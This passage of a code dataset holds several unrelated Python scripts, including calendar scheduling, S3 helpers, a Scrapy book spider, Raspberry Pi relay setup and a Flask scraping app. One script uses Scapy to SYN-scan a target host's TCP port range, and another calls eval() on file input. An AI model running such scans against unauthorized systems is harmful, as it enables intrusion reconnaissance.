a datetime object'''\n\n # parse out the date and time\n month, day, year = [int(s) for s in date.split('/')]\n hour, minute, second = [int(s) for s in time.split(':')]\n\n # create datetime object\n myDatetime = datetime.datetime(year, month, day, hour, minute, second)\n\n return myDatetime\n\ndef convertTo24(time):\n '''Function to convert the am/pm time to 24 hour system time'''\n colonIndex = time.find(':')\n myHour = int(time[:colonIndex])\n if myHour == 12:\n # noon stays 12:00:00; midnight maps to 00:00:00\n return \"12:00:00\" if \"pm\" in time else \"00:00:00\"\n elif \"am\" in time:\n return str(myHour) + \":00:00\"\n elif \"pm\" in time:\n return str(myHour+12) + \":00:00\"\n else:\n print(\"Error in converting to 24 hour system!\")\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'calendar-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef parseData(fname):\n for l in open(fname):\n yield eval(l)\n\ndef readData():\n '''function to read in names for processing'''\n\n # global structures\n global names\n global restrictedHours\n\n print(\"Reading tutor names...\")\n names = json.load(open(FILE_NAMES))\n print(\"done\")\n\n print(\"Reading restricted hours...\")\n restrictedHours = json.load(open(FILE_RESTRICT))\n print(\"done\")\n\ndef getWeek(date):\n\t'''Function to calculate the week of the given date in datetime'''\n\n\tweek = 0\n\tstart = convertToDatetime(\"4/1/2018\", \"6:00:00\")\n\n\t# keep looping until reach week 10 or the start time is greater than date\n\twhile week < 10 and (date - start).total_seconds() > 0:\n\t\tweek += 1\n\t\tstart += datetime.timedelta(days = 7)\n\n\treturn week\n\ndef countTutors(service):\n\n global tutorHours\n global hourCount\n\n # get all of the events in this week\n events = service.events().list(calendarId=CAL_ID, timeMin=TIME_FROM,\n timeMax=TIME_TO, singleEvents=True, orderBy='startTime').execute()\n \n # iterate through all of the events in this week\n for event in events['items']:\n\n # get only those with title: Tutor hour with no TBD\n if event['status'] != 'cancelled' and 'Tutor Hour' in event['summary']:\n\n # parse the list of tutors in this event\n summary = event['summary']\n summary = summary[summary.find(\"(\")+1:len(summary)-1]\n listOfTutors = [t.strip() for t in re.split(',', summary)]\n startTime = str(event['start']['dateTime'])[:-6]\n endTime = str(event['end']['dateTime'])[11:-6]\n currDate = startTime[:10].split('-')\n startTime = startTime[11:]\n myDatetime = convertToDatetime(\\\n \t\"%s/%s/%s\" % (int(currDate[1]), int(currDate[2]), currDate[0]),\\\n \tstartTime)\n myWeek = getWeek(myDatetime)\n\n # increment count for this tutor\n for tutor in listOfTutors:\n \ttutorHours[tutor][myWeek-1].append(str(myDatetime))\n \thourCount[str(myDatetime)] += 1\n\n printTutorHours()\n\n # probably save to file instead of printing it\n\ndef readMasterReport():\n '''function to read in the master report map from file'''\n global masterReport\n if os.path.isfile(\"masterReport.txt\"):\n with open(\"masterReport.txt\", \"rb\") as myFile:\n masterReport = pickle.load(myFile)\n\ndef writeMasterReport():\n '''function to print out report & write out master report map to file'''\n global masterReport\n for k, v in sorted(masterReport.items()):\n print(k)\n for t in v:\n 
print(\"\\t%s\\t%s\\t%s\" % (t[0], t[1], t[2]))\n\n with open(\"masterReport.txt\", \"wb\") as myFile:\n pickle.dump(masterReport, myFile)\n\ndef getEvent(timeslot, service):\n '''function that will return an event with the time slot if exists'''\n\n # get the events on that day\n startTime = \"%sT00:00:00-07:00\" % (timeslot.date())\n endTime = \"%sT23:59:59-07:00\" % (timeslot.date())\n\n # get all of the events in this time frame\n events = service.events().list(calendarId=CAL_ID, timeMin=startTime,\n timeMax=endTime, singleEvents=True, orderBy='startTime').execute()\n\n for event in events['items']:\n\n # get only those with title: Tutor hour with no TBD\n if event['status'] != 'cancelled' and 'Tutor Hour' in event['summary']:\n currTime = str(event['start']['dateTime'])[11:-6]\n if str(timeslot.time()) == currTime:\n # get the list of names\n return event\n\ndef addRequest(myTask, service):\n '''function to add hour to calendar if it passes the condition'''\n myEmail = myTask[TaskInfo.EMAIL.value]\n if myEmail not in names:\n \tprintError(\"No name found-\"+ ADD_DECLINE, myEmail, startTime)\n\n myName = names[myEmail]\n myDate = myTask[TaskInfo.DATE.value]\n allTime = myTask[TaskInfo.TIME.value].split(', ')\n repeatNum = int(myTask[TaskInfo.RECUR.value])\n lastHour = convertToDatetime(LAST_DATE, LAST_HOUR)\n\n for time in allTime:\n\n # split start and end time\n myTime = time.split('-')\n\n # convert the time to 24 hr system\n myTime[0] = convertTo24(myTime[0])\n myTime[1] = convertTo24(myTime[1])\n\n # get the datetime format of the current and future time\n myTimestamp = myTask[TaskInfo.TIMESTAMP.value].split()\n timestamp = convertToDatetime(myTimestamp[0], myTimestamp[1])\n startTime = convertToDatetime(myDate, myTime[0])\n endTime = convertToDatetime(myDate, myTime[1])\n deltaDay = (startTime - timestamp).total_seconds()\n myWeek = getWeek(startTime)\n\n repeatIndex = 0\n while (lastHour - startTime).total_seconds() >= 0 and repeatIndex < repeatNum:\n\n # 1st condition: a future time and at least 24 hours NOTE: not doing 24 hrs check\n # 2nd condition: less than maximum hour\n # 3rd condition: not a restricted hour\n # 4th condition: not repeated\n # 5th condition: current time slot has less than max tutors\n if deltaDay < 0:\n printError(\"It is not a future time-\" + ADD_DECLINE, myName, startTime)\n return\n # disable this for now, hard to keep track\n elif len(tutorHours[myName][myWeek-1]) >= MAX_HOURS:\n \tprintError(\"Has max hours-\" + ADD_DECLINE, myName, startTime)\n \treturn\n elif (myDate in restrictedHours and myTime[0] in restrictedHours[myDate]):\n printError(\"Restricted hours-\" + ADD_DECLINE, myName, startTime)\n return\n elif str(startTime) in tutorHours[myName][myWeek-1]:\n printError(\"Already in timeslot-\" + ADD_DECLINE, myName, startTime)\n return\n elif hourCount[str(startTime)[5:]] >= MAX_TUTORS:\n printError(\"Has max tutors-\" + ADD_DECLINE, myName, startTime)\n return\n\n # check if event exists, if not, create one, if yes, update the title\n myEvent = getEvent(startTime, service)\n if myEvent is None: \n\n # passed the conditions, add the event\n event = {'summary': 'Tutor Hour (%s)' % (myName),\n 'start': {'dateTime': '%sT%s-07:00' % (startTime.date(), startTime.time())},\n 'end': {'dateTime': '%sT%s-07:00' % (endTime.date(), endTime.time())}\n }\n\n event = service.events().insert(calendarId=CAL_ID, body=event).execute()\n print(\"created an event\")\n\n else:\n\n # update the current entry\n openIndex = myEvent['summary'].find('(')\n closeIndex = 
myEvent['summary'].find(')')\n myEvent['summary'] = 'Tutor Hour (' + myEvent['summary'][openIndex+1:closeIndex] + \", \" + myName + ')'\n updated_event = service.events().update(calendarId=CAL_ID, eventId=myEvent['id'], body=myEvent).execute()\n print(\"updated an event\")\n\n # update the recorded hours for this tutor\n tutorHours[myName][myWeek-1].append(str(startTime))\n\n # increment the time by a week\n startTime += datetime.timedelta(days = 7)\n endTime += datetime.timedelta(days = 7)\n repeatIndex += 1\n\ndef removeRequest(myTask, service):\n '''function to remove an hour from the calendar if it passes the conditions'''\n myEmail = myTask[TaskInfo.EMAIL.value]\n if myEmail not in names:\n printError(\"No name found-\" + REMOVE_DECLINE, myEmail, myTask[TaskInfo.DATE.value])\n return\n\n myName = names[myEmail]\n myDate = myTask[TaskInfo.DATE.value]\n allTime = myTask[TaskInfo.TIME.value].split(', ')\n repeatNum = int(myTask[TaskInfo.RECUR.value])\n lastHour = convertToDatetime(LAST_DATE, LAST_HOUR)\n\n for time in allTime:\n\n # split start and end time\n myTime = time.split('-')\n\n # convert the time to 24 hr system\n myTime[0] = convertTo24(myTime[0])\n myTime[1] = convertTo24(myTime[1])\n\n # get the datetime format of the current and future time\n myTimestamp = myTask[TaskInfo.TIMESTAMP.value].split()\n timestamp = convertToDatetime(myTimestamp[0], myTimestamp[1])\n startTime = convertToDatetime(myDate, myTime[0])\n\n repeatIndex = 0\n while (lastHour - startTime).total_seconds() >= 0 and repeatIndex < repeatNum:\n\n # check if it is a future time\n deltaDay = (startTime - timestamp).total_seconds()\n if deltaDay < 0:\n printError(\"It is not a future time-\" + REMOVE_DECLINE, myName, startTime)\n return\n\n # get the event with this start time\n myEvent = getEvent(startTime, service)\n\n # check if hour exists, if not, no hours to remove\n if myEvent is None:\n printError(\"Hour doesn't exist-\" + REMOVE_DECLINE, myName, startTime)\n return\n\n else:\n # update the current entry\n openIndex = myEvent['summary'].find('(')\n closeIndex = myEvent['summary'].find(')')\n listOfNames = myEvent['summary'][openIndex+1:closeIndex].split(', ')\n if myName not in listOfNames:\n printError(\"Not in timeslot-\" + REMOVE_DECLINE, myName, startTime)\n return\n listOfNames.remove(myName)\n\n # case for no tutors in this slot\n if len(listOfNames) == 0:\n service.events().delete(calendarId=CAL_ID, eventId=myEvent['id']).execute()\n\n # case for removing this one tutor from this slot by updating the title\n else:\n strNames = listOfNames[0]\n for i in range(1, len(listOfNames)):\n strNames += \", \" + listOfNames[i]\n myEvent['summary'] = 'Tutor Hour (' + strNames + ')'\n updated_event = service.events().update(calendarId=CAL_ID, eventId=myEvent['id'], body=myEvent).execute()\n\n # increment the time by a week\n startTime += datetime.timedelta(days = 7)\n repeatIndex += 1\n\ndef readRequests():\n '''function to read in the requests from Google Forms'''\n global masterTasks\n if os.path.isfile(FILE_REQUEST):\n with open(FILE_REQUEST) as myFile:\n masterTasks = myFile.readlines()\n\n # list of tuples: (timestamp, email, task, date, times, special)\n masterTasks = [tuple(s.replace('\\n', '').split('\\t')) for s in masterTasks]\n\n #myPrint(masterTasks)\n\ndef processRequests(service):\n '''function to dispatch processing for the tasks read in'''\n # need an index to jump to the new process\n for task in masterTasks:\n if task[2] == 'Add':\n addRequest(task, service)\n elif task[2] == 'Remove':\n removeRequest(task, service)\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n\n Creates a Google Calendar API service 
object and outputs a list of the next\n 10 events on the user's calendar.\n \"\"\"\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http)\n\n # read names to be input to calendar\n readData()\n\n # populate the tutor hours count for each tutor\n countTutors(service)\n\n # read requests and process them\n readRequests()\n processRequests(service)\n\n # double check print\n printTutorHours()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run8B.py","file_name":"run8B.py","file_ext":"py","file_size_in_byte":14852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"116555743","text":"#!/usr/bin/env python\nfrom master_msgs.msg import arm_Orders\nimport rospy\n\nc = 0\nmsg = ''\ndef mover():\n global c,msg\n print('mover')\n if c == 0:\n msg.message = 'G50#'\n print('up')\n c = 1\n elif c == 1:\n msg.message = 'G0#'\n print('down')\n c = 2\n elif c == 2:\n msg.message = 'G50!'\n print('down')\n c = 3\n elif c == 3:\n msg.message = 'G0!'\n print('down')\n c = 0\n# else:\n# c = 0\n\n\ndef prueba():\n global msg\n rospy.init_node('nodo_prueba_brazo', anonymous=True)\n pub_Arm_Orders = rospy.Publisher('topic_arm_orders',arm_Orders,queue_size=10)\n msg = arm_Orders()\n\n rate = rospy.Rate(1)\n print('inicio')\n while not rospy.is_shutdown():\n mover()\n pub_Arm_Orders.publish(msg)\n rate.sleep()\n\nif __name__ == '__main__':\n try:\n prueba()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/prueba_brazo.py","file_name":"prueba_brazo.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393724585","text":"import boto3\nimport sys\nfrom botocore.exceptions import ClientError\n\ndef createBucket(bucket_name,region = None):\n try:\n print(bucket_name)\n if region is None:\n s3_client = boto3.client(\"s3\")\n s3_client.create_bucket(Bucket=bucket_name)\n else:\n s3_client = boto3.client(\"s3\",region_name = region)\n location = { 'LocationConstraint':region}\n s3_client.create_bucket(Bucket=bucket_name,CreateBucketConfiguration=location)\n except ClientError as e:\n print (\"ErrorCode:10\")\n print (\"ErrorName:ClientError\")\n print (\"ErrorMsg:{0}\".format(str(e)))\ndef viewAllBuckets():\n try:\n s3_client = boto3.client(\"s3\")\n print (dir(s3_client)) ### Get the attributes of s3_client, i.e. properties, functions\n res = s3_client.list_buckets()\n print (res)\n for val in res['Buckets']:\n print (val)\n except ClientError as e:\n print (\"ErrorCode:10\")\n print (\"ErrorName:ClientError\")\n print (\"ErrorMsg:{0}\".format(str(e)))\nviewAllBuckets()\n","sub_path":"s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"367571982","text":"# program r6_03_mapa_eu.py\n# basic map\n\nfrom sys import exit\n\ntry:\n import cartopy.crs as crs\n import cartopy.feature as cfeature\n\n print(\"cartopy module loaded.\")\nexcept:\n print(\"Install it: 'pip install cartopy' \")\n exit(0)\n\ntry:\n import matplotlib.pyplot as plt\n\n print(\"matplotlib module loaded.\")\nexcept:\n print(\"Install it: 'pip install matplotlib' \")\n exit(0)\n\n# the loaded data will be stored as `list` objects\ncities = [] # place names\nX = [] # latitude\nY = [] # longitude\n\n# read the data from the file\nwith 
open(\"miasta.csv\", \"r\", encoding='utf-8') as dane:\n cities_all = dane.readlines()\n\nprint(cities_all)\n\n# czyścimy dane\nfor city in cities_all:\n datas = city.strip().split(\",\")\n cities.append(datas[0])\n X.append(float(datas[1]))\n Y.append(float(datas[2]))\n\n# teraz zobaczymy nasze dane\nprint(cities, X, Y, sep=\"\\n======\\n\")\n\n# tworzymy okno\nfigure = plt.figure(figsize=(7, 5))\nax = figure.add_subplot(\n 1, 1, 1, projection=crs.Mercator()\n) # dodajemy projekcję Merkatora\n\n# dodajemy właściwość do mapy, zdjęcie\nax.stock_img()\n\n# wydzielamy tylko wycinek mapy\nax.set_extent([-10, 35, 66, 34], crs=crs.PlateCarree())\n\n# wyświetlamy okno\nplt.show()\n","sub_path":"Rozdzial_6/r6_03_mapa_pl.py","file_name":"r6_03_mapa_pl.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396135635","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name:learning_rate\n Author:jasonhaven\n date:18-9-10\n-------------------------------------------------\n Change Activity:18-9-10:\n-------------------------------------------------\n\"\"\"\nimport tensorflow as tf\n\nw = tf.Variable(tf.constant(5,dtype=tf.float32))\n\nloss = tf.square(w + 1)\n\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\nwith tf.Session() as sess:\n\tsess.run(tf.global_variables_initializer())\n\tfor i in range(40):\n\t\tsess.run(train_step)\n\t\tw_val = sess.run(w)\n\t\tloss_val = sess.run(loss)\n\n\t\tprint('w is %f , loss is %f.' % (w_val, loss_val))\n","sub_path":"tensorflow/人工智能实践/神经网络优化/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"549581703","text":"import os\nimport re\nfrom html import unescape\nimport scrapy\nfrom scrapy.http import Request\nimport logging\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import DNSLookupError, TCPTimedOutError\nfrom ..items import BookItem\nfrom app.utils import WHITE_PATTERN, strip_tags, merge_white\nfrom app.settings import BASEPATH\n\n\nclass DoubanSpider(scrapy.Spider):\n name = 'douban'\n\n # config root logging\n root_logger = logging.getLogger('root')\n rh = logging.FileHandler(os.path.join(BASEPATH, 'log/douban', 'debug.log'))\n rh.setLevel(logging.DEBUG)\n root_logger.addHandler(rh)\n\n # config error logging\n mylogger = logging.getLogger('cymoo')\n mylogger.setLevel(logging.INFO)\n ch = logging.FileHandler(os.path.join(BASEPATH, 'log/douban', 'error.log'), encoding='utf-8')\n ch.setLevel(logging.ERROR)\n mylogger.addHandler(ch)\n\n custom_settings = {\n 'IMAGES_STORE': os.path.join(BASEPATH, 'data/images'),\n 'IMAGES_URLS_FIELD': 'image_urls',\n 'IMAGES_RESULT_FIELD': 'images',\n 'ITEM_PIPELINES': {\n # 'scrapy.pipelines.images.ImagesPipeline': 1,\n 'app.pipelines.douban.BookAttrPipeline': 10,\n 'app.pipelines.douban.SQLitePipeline': 13\n }\n }\n # allowed_domains = []\n list_page_base = 'https://book.douban.com/tag/{}?start=0&type=T'\n start_urls = [\n # 'https://book.douban.com/tag/文学?start=0&type=T'\n # 'https://book.douban.com/tag/编程?start=0&type=T',\n # 'https://book.douban.com/tag/web?start=0&type=T',\n # 'https://book.douban.com/tag/程序?start=0&type=T',\n # 'https://book.douban.com/tag/算法?start=0&type=T',\n 'https://book.douban.com/tag/?view=type&icn=index-sorttags-all'\n ]\n\n def 
start_requests(self):\n        yield from (Request(url, callback=self.parse_index) for url in self.start_urls)\n\n    def parse_index(self, response):\n        for tag in response.css('.tagCol td a::text').extract():\n            yield Request(self.list_page_base.format(tag),\n                          callback=self.parse_list,\n                          errback=self.errback,\n                          meta={'type': tag})\n\n    def parse_list(self, response):\n        for item_url in response.css('.subject-item h2 a::attr(href)').extract():\n            yield response.follow(item_url,\n                                  callback=self.parse_item,\n                                  errback=self.errback,\n                                  meta={'type': response.meta['type']})\n        next_url = response.css('.paginator .next a::attr(href)').extract_first()\n        if next_url:\n            yield response.follow(next_url,\n                                  callback=self.parse_list,\n                                  errback=self.errback,\n                                  meta={'type': response.meta['type']})\n\n    def parse_item(self, response):\n        try:\n            info = _book_info(response.css('#info').extract_first())\n        except Exception as e:\n            self.mylogger.error('%s on %s', repr(e), response.url)\n            # info is undefined when parsing fails, so skip this item\n            return\n        title = response.css('#wrapper > h1 span::text').extract_first()\n        intros = response.css('#link-report .intro')\n        if len(intros) == 0:\n            intro = ''\n        elif len(intros) == 1:\n            intro = intros.extract_first()\n        else:\n            intro = intros[1].extract()\n\n        rating = response.css('.rating_num::text').extract_first()\n        rate_num = response.css('.rating_people span::text').extract_first()\n        type = response.meta['type']\n        url = response.url\n\n        item = BookItem(info)\n        item['title'] = title\n        item['type'] = type\n        item['rating'] = rating\n        item['rate_num'] = rate_num\n        item['url'] = url\n        item['intro'] = intro\n\n        yield item\n\n    def errback(self, failure):\n        # \"http://www.httpbin.org/\", HTTP 200 expected\n        # \"http://www.httpbin.org/status/404\", Not found error\n        # \"http://www.httpbin.org/status/500\", server issue\n        # \"http://www.httpbin.org:12345/\", non-responding host, timeout expected\n        # \"http://www.httphttpbinbin.org/\", DNS error expected\n        self.mylogger.error(repr(failure))\n        if failure.check(HttpError):\n            response = failure.value.response\n            self.mylogger.error('HTTPError on %s', response.url)\n        elif failure.check(DNSLookupError):\n            request = failure.request\n            self.mylogger.error('DNSLookupError on %s', request.url)\n        elif failure.check(TimeoutError, TCPTimedOutError):\n            request = failure.request\n            self.mylogger.error('TimeoutError on %s', request.url)\n\n    # things like session related data or authentication tokens will be pre-populated\n    # def parse_login(self, response):\n    #     return scrapy.FormRequest.from_response(\n    #         response,\n    #         formdata={'username': 'cymoo', 'password': 'secret'},\n    #         callback=self.after_login\n    #     )\n    #\n    # def after_login(self, response):\n    #     if 'authentication failed' in response.body:\n    #         self.logger.error('Login failed')\n    #         return\n    #     # continue scraping with authenticated session...\n\n    # Called when the spider closes.\n    # This method provides a shortcut to signals.connect() for the spider_closed signal.\n    def closed(self, reason):\n        pass\n\n\n# TODO: the price matching is buggy\n_book_pattern = re.compile(r'(?:作者:(.*?))?'\n                           r'(?:出版社:(.*?))?'\n                           r'(?:出品方:(.*?))?'\n                           r'(?:副标题:(.*?))?'\n                           r'(?:原作名:(.*?))?'\n                           r'(?:译者:(.*?))?'\n                           r'(?:出版年:(.*?))?'\n                           r'(?:页数:(.*?))?'\n                           r'定价:.*?(\\d+\\.?\\d+?)', re.S | re.M)\n\n\n_mm = ((0, 'author'), (1, 'press'), (4, 'original'),\n       (5, 'translator'), (6, 'date'), (7, 'pages'),\n       (8, 'price'))\n\n\ndef _book_info(text, trim_tags=True, trim_crlf=True, trim_extra_spaces=True):\n    attr = {}\n    if trim_tags:\n        text = strip_tags(text)\n    if trim_crlf:\n        text = WHITE_PATTERN.sub('', text)\n    if trim_extra_spaces:\n        text 
= merge_white(text)\n\n    text = unescape(text)\n\n    result = _book_pattern.search(text)\n    gps = result.groups()\n    for idx, k in _mm:\n        if gps[idx] is not None:\n            attr[k] = gps[idx].strip()\n        else:\n            attr[k] = ''\n    return attr\n","sub_path":"app/spiders/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"311374020","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport importlib\nimport os\n\nfrom ansible.plugins.lookup import LookupBase\n\nclass LookupModule (LookupBase):\n\n\tdef __init__ (self, * arguments, ** keyword_arguments):\n\n\t\tself.support = (\n\t\t\timportlib.import_module (\n\t\t\t\tos.environ [\"GRIDLINKER_SUPPORT\"]).support)\n\n\t\tself.context = (\n\t\t\tself.support.get_context ())\n\n\t\tself.client = (\n\t\t\tself.context.client)\n\n\t\tLookupBase.__init__ (\n\t\t\tself,\n\t\t\t* arguments,\n\t\t\t** keyword_arguments)\n\n\tdef run (self, terms, variables, ** keyword_arguments):\n\n\t\tret = []\n\n\t\tfor term in terms:\n\n\t\t\tkey = term.split () [0]\n\n\t\t\tvalue = self.client.exists (key)\n\n\t\t\tif value:\n\t\t\t\tret.append (\"yes\")\n\n\t\t\telse:\n\t\t\t\tret.append (\"no\")\n\n\t\treturn ret\n\n# ex: noet ts=4 filetype=python\n","sub_path":"misc/ansible-lookup-plugins/etcd_exists.py","file_name":"etcd_exists.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"192063389","text":"#These functions will display various patterns (i.e. chaser, alternating, twinkling)\r\n#File will not work unless executed on a raspberry pi connected to an 8 channel relay board\r\nimport RPi.GPIO as gp\r\n\r\nimport time\r\nfrom time import sleep\r\n\r\nimport threading\r\nfrom threading import Thread\r\n\r\n#Set GPIO pin mode to broadcom\r\ngp.setmode(gp.BCM)\r\ndef gpmode():\r\n    gp.setmode(gp.BCM)\r\n\r\n\r\n#Deactivate warnings in console\r\ngp.setwarnings(False)\r\n\r\n#Active GPIO pins in relay board\r\npList = [2, 3, 4, 17, 27, 22, 10, 9]\r\n\r\npListEven = [3, 17, 22, 9]\r\npListOdd = [2, 4, 27, 10]\r\n\r\npListHalf1 = [2, 3, 4, 17]\r\npListHalf2 = [27, 22, 10, 9]\r\n\r\n#2 is In1\r\n#3 is In2\r\n#4 is In3\r\n#17 is In4\r\n#27 is In5\r\n#22 is In6\r\n#10 is In7\r\n#9 is In8\r\n\r\nfor i in pList:\r\n    gp.setup(i, gp.OUT)\r\n    gp.output(i, gp.HIGH)\r\n\r\ndef oputMode():\r\n    for i in pList:\r\n        gp.setup(i, gp.OUT)\r\n        gp.output(i, gp.HIGH)\r\n    \r\n#Rest times\r\nrestBlink = .1\r\nrestQuarter = .25\r\nrestHalf = .5\r\nrestFull = 1\r\nrestTwoFull = 2\r\nrestLong = 5\r\nrestHibernate = 10\r\n\r\n#GPIO input/output controls\r\nlow = gp.LOW\r\nhigh = gp.HIGH\r\noput = gp.output\r\n\r\ndef reset():\r\n    gpmode();\r\n    oputMode();\r\n    gp.cleanup()\r\n","sub_path":"relayPatterns.py","file_name":"relayPatterns.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"49087726","text":"from scapy.all import *\nimport sys\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\n\nif len(sys.argv) != 4: # python portScanner_Test.py 127.0.0.1 22 65500\n    print(\"usage: %s target startport endport\" % (sys.argv[0]))\n    sys.exit(0)\n\ntarget = str(sys.argv[1])\nstartport = int(sys.argv[2])\nendport = int(sys.argv[3])\nprint(\"Scanning \" + target + \" for open TCP ports\")\n\nif startport == endport:\n    endport += 1\n\nfor x 
in range(startport, endport):\n    packet = IP(dst=target)/TCP(dport=x, flags='S')\n    response = sr1(packet, timeout=0.5, verbose=0)\n    # 0x12 is the TCP flags value for SYN-ACK\n    if response is not None and response.haslayer(TCP) and response.getlayer(TCP).flags == 0x12:\n        print(\"Port \"+str(x)+\" is open!\")\n        sr(IP(dst=target)/TCP(dport=response.sport, flags=\"R\"),\n          timeout=0.5, verbose=0) # R in scapy is for RST\n\nprint(\"Scan is complete!\\n\")\n","sub_path":"portScanner_Test.py","file_name":"portScanner_Test.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"62367553","text":"# Import dependencies\nfrom flask import Flask, render_template\nfrom flask_pymongo import PyMongo\nimport scraping\n\n# Set up Flask\napp = Flask(__name__)\n\n# Use flask_pymongo to set up mongo connection\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n# Define the route for the HTML page\n@app.route(\"/\")\ndef index():\n    mars = mongo.db.mars.find_one()\n    return render_template(\"index.html\", mars=mars)\n\n# Add next route for scraping\n@app.route(\"/scrape\")\ndef scrape():\n    mars = mongo.db.mars\n    mars_data = scraping.scrape_all()\n    mars.update({}, mars_data, upsert=True)\n    return render_template(\"scrape.html\")\n\n# Add routes for hemisphere images\n@app.route(\"/img1\")\ndef img1():\n    mars = mongo.db.mars.find_one()\n    return render_template(\"img1.html\", mars=mars)\n\n@app.route(\"/img2\")\ndef img2():\n    mars = mongo.db.mars.find_one()\n    return render_template(\"img2.html\", mars=mars)\n\n@app.route(\"/img3\")\ndef img3():\n    mars = mongo.db.mars.find_one()\n    return render_template(\"img3.html\", mars=mars)\n\n@app.route(\"/img4\")\ndef img4():\n    mars = mongo.db.mars.find_one()\n    return render_template(\"img4.html\", mars=mars)\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","sub_path":"apps/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"253432886","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May  1 16:43:05 2017\n\n@author: gualandi\n\"\"\"\nimport time\nimport csv\nimport numpy as np\n\nfrom numpy import genfromtxt\nimport matplotlib.pyplot as plt\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score\n\n\ndef DrawDigit(A, label=''):\n    \"\"\" Draw single digit as a greyscale matrix\"\"\"\n    fig = plt.figure(figsize=(6,6))\n    # Use the 'gray' colormap to get the board in black & white\n    img = plt.imshow(A, cmap='gray_r')\n    plt.xlabel(label)\n    plt.show()\n    \ndef ElaborateTrainingSet(data):\n    \"\"\" Elaborate training set \"\"\"\n    X = []\n    Y = [] \n    for row in data:\n        X.append(np.array(row[1:]))\n        Y.append(int(row[0])) \n    return X, Y\n\ndef ElaborateTestSet(data):\n    \"\"\" Elaborate test set \"\"\"\n    X = []\n    for row in data:\n        X.append(np.array(row))\n    return X\n\ndef LearnANN(data):\n    \"\"\" Learn an Artificial Neural Network and return the corresponding object \"\"\"\n    x_train, y_train = ElaborateTrainingSet(data) \n    \n    # BEFORE ATTEMPTING THIS EXERCISE, STUDY THE TUTORIAL:\n    # http://scikit-learn.org/stable/modules/neural_networks_supervised.html\n    #\n    # EXERCISE: TRY OUT THE DIFFERENT PARAMETERS OF THIS CLASS\n    # http://scikit-learn.org/stable/modules/generated/sklearn.neural_network.MLPClassifier.html\n    ann = MLPClassifier(hidden_layer_sizes=(1), random_state=1)\n    ann.fit(x_train, y_train)\n    return ann\n
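\n# A parameter variation worth trying for the exercise above (an illustrative\n# sketch using standard scikit-learn MLPClassifier arguments; these particular\n# values are not from the original author):\n# ann = MLPClassifier(hidden_layer_sizes=(100, 50), activation='relu',\n#                     alpha=1e-4, max_iter=200, random_state=1)\n\ndef 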
TestANN(ann, x_test, y_test):\n    \"\"\" Test the learned ANN on the given set of data \"\"\"\n    y_pred = ann.predict(x_test)\n    \n    print(\"Accuracy: \", accuracy_score(y_test, y_pred), ' - Number of iterations:', ann.n_iter_)\n    \n    # Write the predictions in a .csv file\n    with open('solution.csv','w') as csv_file:\n        writer = csv.writer(csv_file, delimiter=',', lineterminator='\\n')\n        writer.writerow(['ImageId','Label'])\n        for i,p in enumerate(y_pred):\n            writer.writerow([i+1,p])\n\n\ndef EvaluateANN(ann, x_test):\n    \"\"\" Test the learned ANN and produce output for Kaggle \"\"\"\n    start = time.time()\n    \n    y_pred = ann.predict(x_test)\n    \n    print('Evaluation time:', time.time()-start,'- size:', len(my_test)) \n    print('Number of iterations:', ann.n_iter_)\n    \n    # Write the predictions in a .csv file\n    with open('solution.csv','w') as csv_file:\n        writer = csv.writer(csv_file, delimiter=',', lineterminator='\\n')\n        writer.writerow(['ImageId','Label'])\n        for i,p in enumerate(y_pred):\n            writer.writerow([i+1,p])\n    \n\n#------------------------------------------\n# MAIN ENTRY 